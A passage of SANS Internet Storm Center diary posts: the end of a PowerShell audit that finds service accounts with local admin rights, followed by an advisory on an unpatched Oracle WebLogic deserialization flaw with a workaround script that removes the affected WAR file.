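# yesterday's collection and $TargetSVCAccounts was built above
$localadmins = @([pscustomobject]@{ AdminID = "svc-backup" })
$TargetSVCAccounts = @("AD\svc-backup", "svc-printer@ad.int")

$SVCLocalAdmins = @()
$Admins = $localadmins.AdminID.toupper()

Foreach ($Acct in $TargetSVCAccounts) {
    # strip the domain prefix / suffix ("AD\" / "@AD.INT" match the example domain)
    $a = $Acct.toUpper() -replace '^AD\\','' -replace '@AD\.INT$',''
    if ($Admins.Contains($a)) { $SVCLocalAdmins += $a }
}
$SVCLocalAdmins | Sort-Object -Unique | export-csv Service-LocalAdmins.csv
```

Anchored -replace is used to strip the domain prefix and suffix, since Trim() removes a set of characters from the ends of a string rather than a substring, and can eat into the account name itself.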

If you have a minute today, try this on your domain - use our comment form to let us know if you find anything interesting!

What will we do with this list of accounts next?  Stay tuned for the next installment tomorrow :-)


Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
April 25, 2019

Unpatched Vulnerability Alert - WebLogic Zero Day, (Thu, Apr 25th)

The news today is full of a new deserialization vulnerability in Oracle WebLogic.  This affects all current versions of the product (the POC is against 10.3, but 12.x versions are also affected).  The vulnerability affects the wls9_async_response package (which is not included by default in all builds), so the workaround is to either ACL the /_async/* and /wls-wsat/* paths, or delete wls9_async_response.war.  A successful attack gets the attacker remote code execution on the vulnerable server.
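On a Windows-based WebLogic install, the delete-the-WAR workaround might look like the sketch below.  The install path and $WL_HOME value are assumptions - verify them against your own server, keep a backup, and restart WebLogic afterwards:

```powershell
# Assumed WebLogic home - adjust for your install
$WL_HOME = "C:\Oracle\Middleware\wlserver"
$war = Join-Path $WL_HOME "server\lib\wls9_async_response.war"

if (Test-Path $war) {
    Copy-Item $war "$war.bak"   # keep a backup copy first
    Remove-Item $war            # then restart the WebLogic server
}
```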

The root cause here seems to be that the affected WAR components ingest and process all serialized data, and have a blacklist of "bad" content.  What this means to me is that we're likely to see a number of similar vulnerabilities / attacks crop up over the next while, until Oracle changes this approach.

Indications are that the number of affected sites is in the "tens of thousands", not hundreds of thousands or millions (not yet at least).

The vulnerability is posted as CNVD-2018-07811 in the China National Vulnerability Database.  We don't have a CVE yet.

This bug was originally disclosed by the China Minsheng Banking Co.  There's a good write-up with a bit more detail by the KnownSec 404 Team.

This comes just one week after Oracle's "Patch Everything" Critical Patch Update (CPU).  The next CPU isn't due for 3 months, so it'll be interesting to see what out-of-band patch or patches (if any) Oracle releases in response.

Stay tuned - we'll update this story as we get more information - in particular, if we see attacks in the wild we'll post IoCs as we get them.
